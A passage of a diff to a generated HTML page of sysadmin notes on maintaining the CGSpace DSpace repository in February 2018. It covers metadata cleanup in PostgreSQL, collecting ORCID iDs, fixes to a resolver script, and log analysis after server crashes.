</code></pre><ul>
<li>If I change choices.presentation to suggest it give this error:</li>
</ul>
<pre><code>xmlui.mirage2.forms.instancedCompositeFields.noSuggestionError
<pre tabindex="0"><code>xmlui.mirage2.forms.instancedCompositeFields.noSuggestionError
</code></pre><ul>
<li>So I don&rsquo;t think we can disable the ORCID lookup function and keep the ORCID badges</li>
</ul>
@ -394,12 +393,12 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
<ul>
<li>I downloaded the PDF and manually generated a thumbnail with ImageMagick and it looked better:</li>
</ul>
<pre><code>$ convert CCAFS_WP_223.pdf\[0\] -profile /usr/local/share/ghostscript/9.22/iccprofiles/default_cmyk.icc -thumbnail 600x600 -flatten -profile /usr/local/share/ghostscript/9.22/iccprofiles/default_rgb.icc CCAFS_WP_223.jpg
<pre tabindex="0"><code>$ convert CCAFS_WP_223.pdf\[0\] -profile /usr/local/share/ghostscript/9.22/iccprofiles/default_cmyk.icc -thumbnail 600x600 -flatten -profile /usr/local/share/ghostscript/9.22/iccprofiles/default_rgb.icc CCAFS_WP_223.jpg
</code></pre><p><img src="/cgspace-notes/2018/02/CCAFS_WP_223.jpg" alt="Manual thumbnail"></p>
<ul>
<li>Peter sent me corrected author names last week but the file encoding is messed up:</li>
</ul>
<pre><code>$ isutf8 authors-2018-02-05.csv
<pre tabindex="0"><code>$ isutf8 authors-2018-02-05.csv
authors-2018-02-05.csv: line 100, char 18, byte 4179: After a first byte between E1 and EC, expecting the 2nd byte between 80 and BF.
</code></pre><ul>
<li>The <code>isutf8</code> program comes from <code>moreutils</code></li>
@ -409,18 +408,18 @@ authors-2018-02-05.csv: line 100, char 18, byte 4179: After a first byte between
<li>I updated my <code>fix-metadata-values.py</code> and <code>delete-metadata-values.py</code> scripts on the scripts page: <a href="https://github.com/ilri/DSpace/wiki/Scripts">https://github.com/ilri/DSpace/wiki/Scripts</a></li>
<li>I ran the 342 author corrections (after trimming whitespace and excluding those with <code>||</code> and other syntax errors) on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Then I ran a full Discovery re-indexing:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>That reminds me that Bizu had asked me to fix some of Alan Duncan&rsquo;s names in December</li>
<li>I see he actually has some variations with &ldquo;Duncan, Alan J.&quot;: <a href="https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=">https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=</a></li>
<li>I see he actually has some variations with &ldquo;Duncan, Alan J.&rdquo;: <a href="https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=">https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=</a></li>
<li>I will just update those for her too and then restart the indexing:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Duncan, Alan%&#39;;
text_value | authority | confidence
-----------------+--------------------------------------+------------
Duncan, Alan J. | 5ff35043-942e-4d0a-b377-4daed6e3c1a3 | 600
@ -434,9 +433,9 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
(8 rows)
dspace=# begin;
dspace=# update metadatavalue set text_value='Duncan, Alan', authority='a6486522-b08a-4f7a-84f9-3a73ce56034d', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Duncan, Alan%';
dspace=# update metadatavalue set text_value=&#39;Duncan, Alan&#39;, authority=&#39;a6486522-b08a-4f7a-84f9-3a73ce56034d&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Duncan, Alan%&#39;;
UPDATE 216
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Duncan, Alan%&#39;;
text_value | authority | confidence
--------------+--------------------------------------+------------
Duncan, Alan | a6486522-b08a-4f7a-84f9-3a73ce56034d | 600
@ -464,7 +463,7 @@ dspace=# commit;
<li>I see that in <a href="/cgspace-notes/2017-04/">April, 2017</a> I just used a SQL query to get a user&rsquo;s submissions by checking the <code>dc.description.provenance</code> field</li>
<li>So for Abenet, I can check her submissions in December, 2017 with:</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*yabowork.*2017-12.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^Submitted.*yabowork.*2017-12.*&#39;;
</code></pre><ul>
<li>I emailed Peter to ask whether we can move DSpace Test to a new Linode server and attach 300 GB of disk space to it</li>
<li>This would be using <a href="https://www.linode.com/blockstorage">Linode&rsquo;s new block storage volumes</a></li>
@ -477,14 +476,14 @@ dspace=# commit;
<li>Peter said he was getting a &ldquo;socket closed&rdquo; error on CGSpace</li>
<li>I looked in the dspace.log.2018-02-13 and saw one recent one:</li>
</ul>
<pre><code>2018-02-13 12:50:13,656 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
<pre tabindex="0"><code>2018-02-13 12:50:13,656 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
...
Caused by: java.net.SocketException: Socket closed
</code></pre><ul>
<li>Could be because of the <code>removeAbandoned=&quot;true&quot;</code> that I enabled in the JDBC connection pool last week?</li>
</ul>
<pre><code>$ grep -c &quot;java.net.SocketException: Socket closed&quot; dspace.log.2018-02-*
<pre tabindex="0"><code>$ grep -c &#34;java.net.SocketException: Socket closed&#34; dspace.log.2018-02-*
dspace.log.2018-02-01:0
dspace.log.2018-02-02:0
dspace.log.2018-02-03:0
@ -503,7 +502,7 @@ dspace.log.2018-02-13:4
<li>I will increase the removeAbandonedTimeout from its default of 60 to 90 and enable logAbandoned</li>
<li>Peter hit this issue one more time, and this is apparently what Tomcat&rsquo;s catalina.out log says when an abandoned connection is removed:</li>
</ul>
<pre><code>Feb 13, 2018 2:05:42 PM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
<pre tabindex="0"><code>Feb 13, 2018 2:05:42 PM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
WARNING: Connection has been abandoned PooledConnection[org.postgresql.jdbc.PgConnection@22e107be]:java.lang.Exception
</code></pre><h2 id="2018-02-14">2018-02-14</h2>
<ul>
@ -521,41 +520,41 @@ WARNING: Connection has been abandoned PooledConnection[org.postgresql.jdbc.PgCo
<li>Atmire responded on the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">DSpace 5.8 compatability ticket</a> and said they will let me know if they they want me to give them a clean 5.8 branch</li>
<li>I formatted my list of ORCID IDs as a controlled vocabulary, sorted alphabetically, then ran through XML tidy:</li>
</ul>
<pre><code>$ sort cgspace-orcids.txt &gt; dspace/config/controlled-vocabularies/cg-creator-id.xml
<pre tabindex="0"><code>$ sort cgspace-orcids.txt &gt; dspace/config/controlled-vocabularies/cg-creator-id.xml
$ add XML formatting...
$ tidy -xml -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
</code></pre><ul>
<li>It seems the tidy fucks up accents, for example it turns <code>Adriana Tofiño (0000-0001-7115-7169)</code> into <code>Adriana Tofiño (0000-0001-7115-7169)</code></li>
<li>We need to force UTF-8:</li>
</ul>
<pre><code>$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
<pre tabindex="0"><code>$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
</code></pre><ul>
<li>This preserves special accent characters</li>
<li>I tested the display and store of these in the XMLUI and PostgreSQL and it looks good</li>
<li>Sisay exported all ILRI, CIAT, etc authors from ORCID and sent a list of 600+</li>
<li>Peter combined it with mine and we have 1204 unique ORCIDs!</li>
</ul>
<pre><code>$ grep -coE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv
<pre tabindex="0"><code>$ grep -coE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; CGcenter_ORCID_ID_combined.csv
1204
$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv | sort | uniq | wc -l
$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; CGcenter_ORCID_ID_combined.csv | sort | uniq | wc -l
1204
</code></pre><ul>
<li>Also, save that regex for the future because it will be very useful!</li>
<li>CIAT sent a list of their authors' ORCIDs and combined with ours there are now 1227:</li>
<li>CIAT sent a list of their authors&rsquo; ORCIDs and combined with ours there are now 1227:</li>
</ul>
<pre><code>$ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1227
</code></pre><ul>
<li>There are some formatting issues with names in Peter&rsquo;s list, so I should remember to re-generate the list of names from ORCID&rsquo;s API once we&rsquo;re done</li>
<li>The <code>dspace cleanup -v</code> currently fails on CGSpace with the following:</li>
</ul>
<pre><code> - Deleting bitstream record from database (ID: 149473)
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(149473) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code> - Deleting bitstream record from database (ID: 149473)
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(149473) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is to update the bitstream table, as I&rsquo;ve discovered several other times in 2016 and 2017:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);&#39;
UPDATE 1
</code></pre><ul>
<li>Then the cleanup process will continue for awhile and hit another foreign key conflict, and eventually it will complete after you manually resolve them all</li>
@ -575,25 +574,25 @@ UPDATE 1
<li>I only looked quickly in the logs but saw a bunch of database errors</li>
<li>PostgreSQL connections are currently:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | uniq -c
2 dspaceApi
1 dspaceWeb
3 dspaceApi
</code></pre><ul>
<li>I see shitloads of memory errors in Tomcat&rsquo;s logs:</li>
</ul>
<pre><code># grep -c &quot;Java heap space&quot; /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#34;Java heap space&#34; /var/log/tomcat7/catalina.out
56
</code></pre><ul>
<li>And shit tons of database connections abandoned:</li>
</ul>
<pre><code># grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; /var/log/tomcat7/catalina.out
612
</code></pre><ul>
<li>I have no fucking idea why it crashed</li>
<li>The XMLUI activity looks like:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &quot;15/Feb/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;15/Feb/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
715 63.143.42.244
746 213.55.99.121
886 68.180.228.157
@ -610,7 +609,7 @@ UPDATE 1
<li>I made a pull request to fix it ((#354)[https://github.com/ilri/DSpace/pull/354])</li>
<li>I should remember to update existing values in PostgreSQL too:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;United States Agency for International Development&#39; where resource_type_id=2 and metadata_field_id=29 and text_value like &#39;%U.S. Agency for International Development%&#39;;
UPDATE 2
</code></pre><h2 id="2018-02-18">2018-02-18</h2>
<ul>
@ -624,7 +623,7 @@ UPDATE 2
<li>Run system updates on DSpace Test (linode02) and reboot the server</li>
<li>Looking back at the system errors on 2018-02-15, I wonder what the fuck caused this:</li>
</ul>
<pre><code>$ wc -l dspace.log.2018-02-1{0..8}
<pre tabindex="0"><code>$ wc -l dspace.log.2018-02-1{0..8}
383483 dspace.log.2018-02-10
275022 dspace.log.2018-02-11
249557 dspace.log.2018-02-12
@ -638,21 +637,21 @@ UPDATE 2
<li>From an average of a few hundred thousand to over four million lines in DSpace log?</li>
<li>Using grep&rsquo;s <code>-B1</code> I can see the line before the heap space error, which has the time, ie:</li>
</ul>
<pre><code>2018-02-15 16:02:12,748 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
<pre tabindex="0"><code>2018-02-15 16:02:12,748 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>So these errors happened at hours 16, 18, 19, and 20</li>
<li>Let&rsquo;s see what was going on in nginx then:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | wc -l
168571
# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &quot;15/Feb/2018:(16|18|19|20)&quot; | wc -l
# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &#34;15/Feb/2018:(16|18|19|20)&#34; | wc -l
8188
</code></pre><ul>
<li>Only 8,000 requests during those four hours, out of 170,000 the whole day!</li>
<li>And the usage of XMLUI, REST, and OAI looks SUPER boring:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &quot;15/Feb/2018:(16|18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &#34;15/Feb/2018:(16|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
111 95.108.181.88
158 45.5.184.221
201 104.196.152.243
@ -677,42 +676,42 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
<ul>
<li>Combined list of CGIAR author ORCID iDs is up to 1,500:</li>
</ul>
<pre><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1571
</code></pre><ul>
<li>I updated my <code>resolve-orcids-from-solr.py</code> script to be able to resolve ORCID identifiers from a text file so I renamed it to <code>resolve-orcids.py</code></li>
<li>Also, I updated it so it uses several new options:</li>
</ul>
<pre><code>$ ./resolve-orcids.py -i input.txt -o output.txt
<pre tabindex="0"><code>$ ./resolve-orcids.py -i input.txt -o output.txt
$ cat output.txt
Ali Ramadhan: 0000-0001-5019-1368
Ahmad Maryudi: 0000-0001-5051-7217
</code></pre><ul>
<li>I was running this on the new list of 1571 and found an error:</li>
</ul>
<pre><code>Looking up the name associated with ORCID iD: 0000-0001-9634-1958
<pre tabindex="0"><code>Looking up the name associated with ORCID iD: 0000-0001-9634-1958
Traceback (most recent call last):
File &quot;./resolve-orcids.py&quot;, line 111, in &lt;module&gt;
File &#34;./resolve-orcids.py&#34;, line 111, in &lt;module&gt;
read_identifiers_from_file()
File &quot;./resolve-orcids.py&quot;, line 37, in read_identifiers_from_file
File &#34;./resolve-orcids.py&#34;, line 37, in read_identifiers_from_file
resolve_orcid_identifiers(orcids)
File &quot;./resolve-orcids.py&quot;, line 65, in resolve_orcid_identifiers
family_name = data['name']['family-name']['value']
TypeError: 'NoneType' object is not subscriptable
File &#34;./resolve-orcids.py&#34;, line 65, in resolve_orcid_identifiers
family_name = data[&#39;name&#39;][&#39;family-name&#39;][&#39;value&#39;]
TypeError: &#39;NoneType&#39; object is not subscriptable
</code></pre><ul>
<li>According to ORCID that identifier&rsquo;s family-name is null so that sucks</li>
<li>I fixed the script so that it checks if the family name is null</li>
<li>Now another:</li>
</ul>
<pre><code>Looking up the name associated with ORCID iD: 0000-0002-1300-3636
<pre tabindex="0"><code>Looking up the name associated with ORCID iD: 0000-0002-1300-3636
Traceback (most recent call last):
File &quot;./resolve-orcids.py&quot;, line 117, in &lt;module&gt;
File &#34;./resolve-orcids.py&#34;, line 117, in &lt;module&gt;
read_identifiers_from_file()
File &quot;./resolve-orcids.py&quot;, line 37, in read_identifiers_from_file
File &#34;./resolve-orcids.py&#34;, line 37, in read_identifiers_from_file
resolve_orcid_identifiers(orcids)
File &quot;./resolve-orcids.py&quot;, line 65, in resolve_orcid_identifiers
if data['name']['given-names']:
TypeError: 'NoneType' object is not subscriptable
File &#34;./resolve-orcids.py&#34;, line 65, in resolve_orcid_identifiers
if data[&#39;name&#39;][&#39;given-names&#39;]:
TypeError: &#39;NoneType&#39; object is not subscriptable
</code></pre><ul>
<li>According to ORCID that identifier&rsquo;s entire name block is null!</li>
</ul>
@ -722,14 +721,14 @@ TypeError: 'NoneType' object is not subscriptable
<li>Discuss some of the issues with null values and poor-quality names in some ORCID identifiers with Abenet and I think we&rsquo;ll now only use ORCID iDs that have been sent to use from partners, not those extracted via keyword searches on orcid.org</li>
<li>This should be the version we use (the existing controlled vocabulary generated from CGSpace&rsquo;s Solr authority core plus the IDs sent to us so far by partners):</li>
</ul>
<pre><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; 2018-02-20-combined.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; 2018-02-20-combined.txt
</code></pre><ul>
<li>I updated the <code>resolve-orcids.py</code> to use the &ldquo;credit-name&rdquo; if it exists in a profile, falling back to &ldquo;given-names&rdquo; + &ldquo;family-name&rdquo;</li>
<li>Also, I added color coded output to the debug messages and added a &ldquo;quiet&rdquo; mode that supresses the normal behavior of printing results to the screen</li>
<li>I&rsquo;m using this as the test input for <code>resolve-orcids.py</code>:</li>
</ul>
<pre><code>$ cat orcid-test-values.txt
# valid identifier with 'given-names' and 'family-name'
<pre tabindex="0"><code>$ cat orcid-test-values.txt
# valid identifier with &#39;given-names&#39; and &#39;family-name&#39;
0000-0001-5019-1368
# duplicate identifier
@ -738,16 +737,16 @@ TypeError: 'NoneType' object is not subscriptable
# invalid identifier
0000-0001-9634-19580
# has a 'credit-name' value we should prefer
# has a &#39;credit-name&#39; value we should prefer
0000-0002-1735-7458
# has a blank 'credit-name' value
# has a blank &#39;credit-name&#39; value
0000-0001-5199-5528
# has a null 'name' object
# has a null &#39;name&#39; object
0000-0002-1300-3636
# has a null 'family-name' value
# has a null &#39;family-name&#39; value
0000-0001-9634-1958
# missing ORCID identifier
@ -770,7 +769,7 @@ TypeError: 'NoneType' object is not subscriptable
<li>It looks like Sisay restarted Tomcat because I was offline</li>
<li>There was absolutely nothing interesting going on at 13:00 on the server, WTF?</li>
</ul>
<pre><code># cat /var/log/nginx/*.log | grep -E &quot;22/Feb/2018:13&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># cat /var/log/nginx/*.log | grep -E &#34;22/Feb/2018:13&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
55 192.99.39.235
60 207.46.13.26
62 40.77.167.38
@ -784,7 +783,7 @@ TypeError: 'NoneType' object is not subscriptable
</code></pre><ul>
<li>Otherwise there was pretty normal traffic the rest of the day:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;22/Feb/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;22/Feb/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
839 216.244.66.245
1074 68.180.228.117
1114 157.55.39.100
@ -798,16 +797,16 @@ TypeError: 'NoneType' object is not subscriptable
</code></pre><ul>
<li>So I don&rsquo;t see any definite cause for this crash, I see a shit ton of abandoned PostgreSQL connections today around 1PM!</li>
</ul>
<pre><code># grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; /var/log/tomcat7/catalina.out
729
# grep 'Feb 22, 2018 1' /var/log/tomcat7/catalina.out | grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon'
# grep &#39;Feb 22, 2018 1&#39; /var/log/tomcat7/catalina.out | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39;
519
</code></pre><ul>
<li>I think the <code>removeAbandonedTimeout</code> might still be too low (I increased it from 60 to 90 seconds last week)</li>
<li>Abandoned connections is not a cause but a symptom, though perhaps something more like a few minutes is better?</li>
<li>Also, while looking at the logs I see some new bot:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.4.2661.102 Safari/537.36; 360Spider
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.4.2661.102 Safari/537.36; 360Spider
</code></pre><ul>
<li>It seems to re-use its user agent but makes tons of useless requests and I wonder if I should add &ldquo;.<em>spider.</em>&rdquo; to the Tomcat Crawler Session Manager valve?</li>
</ul>
@ -820,19 +819,19 @@ TypeError: 'NoneType' object is not subscriptable
<li>A few days ago Abenet sent me the list of ORCID iDs from CCAFS</li>
<li>We currently have 988 unique identifiers:</li>
</ul>
<pre><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
988
</code></pre><ul>
<li>After adding the ones from CCAFS we now have 1004:</li>
</ul>
<pre><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1004
</code></pre><ul>
<li>I will add them to DSpace Test but Abenet says she&rsquo;s still waiting to set us ILRI&rsquo;s list</li>
<li>I will tell her that we should proceed on sharing our work on DSpace Test with the partners this week anyways and we can update the list later</li>
<li>While regenerating the names for these ORCID identifiers I saw <a href="https://pub.orcid.org/v2.1/0000-0002-2614-426X/person">one that has a weird value for its names</a>:</li>
</ul>
<pre><code>Looking up the names associated with ORCID iD: 0000-0002-2614-426X
<pre tabindex="0"><code>Looking up the names associated with ORCID iD: 0000-0002-2614-426X
Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
</code></pre><ul>
<li>I don&rsquo;t know if the user accidentally entered this as their name or if that&rsquo;s how ORCID behaves when the name is private?</li>
@ -843,7 +842,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
<li>Thinking about how to preserve ORCID identifiers attached to existing items in CGSpace</li>
<li>We have over 60,000 unique author + authority combinations on CGSpace:</li>
</ul>
<pre><code>dspace=# select count(distinct (text_value, authority)) from metadatavalue where resource_type_id=2 and metadata_field_id=3;
<pre tabindex="0"><code>dspace=# select count(distinct (text_value, authority)) from metadatavalue where resource_type_id=2 and metadata_field_id=3;
count
-------
62464
@ -853,7 +852,7 @@ Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
<li>The query in Solr would simply be <code>orcid_id:*</code></li>
<li>Assuming I know that authority record with <code>id:d7ef744b-bbd4-4171-b449-00e37e1b776f</code>, then I could query PostgreSQL for all metadata records using that authority:</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and authority='d7ef744b-bbd4-4171-b449-00e37e1b776f';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and authority=&#39;d7ef744b-bbd4-4171-b449-00e37e1b776f&#39;;
metadata_value_id | resource_id | metadata_field_id | text_value | text_lang | place | authority | confidence | resource_type_id
-------------------+-------------+-------------------+---------------------------+-----------+-------+--------------------------------------+------------+------------------
2726830 | 77710 | 3 | Rodríguez Chalarca, Jairo | | 2 | d7ef744b-bbd4-4171-b449-00e37e1b776f | 600 | 2
@ -862,13 +861,13 @@ Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
<li>Then I suppose I can use the <code>resource_id</code> to identify the item?</li>
<li>Actually, <code>resource_id</code> is the same id we use in CSV, so I could simply build something like this for a metadata import!</li>
</ul>
<pre><code>id,cg.creator.id
<pre tabindex="0"><code>id,cg.creator.id
93848,Alan S. Orth: 0000-0002-1735-7458||Peter G. Ballantyne: 0000-0001-9346-2893
</code></pre><ul>
<li>I just discovered that <a href="https://requests-cache.readthedocs.io">requests-cache</a> can transparently cache HTTP requests</li>
<li>Running <code>resolve-orcids.py</code> with my test input takes 10.5 seconds the first time, and then 3.0 seconds the second time!</li>
</ul>
<pre><code>$ time ./resolve-orcids.py -i orcid-test-values.txt -o /tmp/orcid-names
<pre tabindex="0"><code>$ time ./resolve-orcids.py -i orcid-test-values.txt -o /tmp/orcid-names
Ali Ramadhan: 0000-0001-5019-1368
Alan S. Orth: 0000-0002-1735-7458
Ibrahim Mohammed: 0000-0001-5199-5528
@ -896,28 +895,28 @@ Nor Azwadi: 0000-0001-9634-1958
<li>I need to see which SQL queries are run during that time</li>
<li>And only a few hours after I disabled the <code>removeAbandoned</code> thing CGSpace went down and lo and behold, there were 264 connections, most of which were idle:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
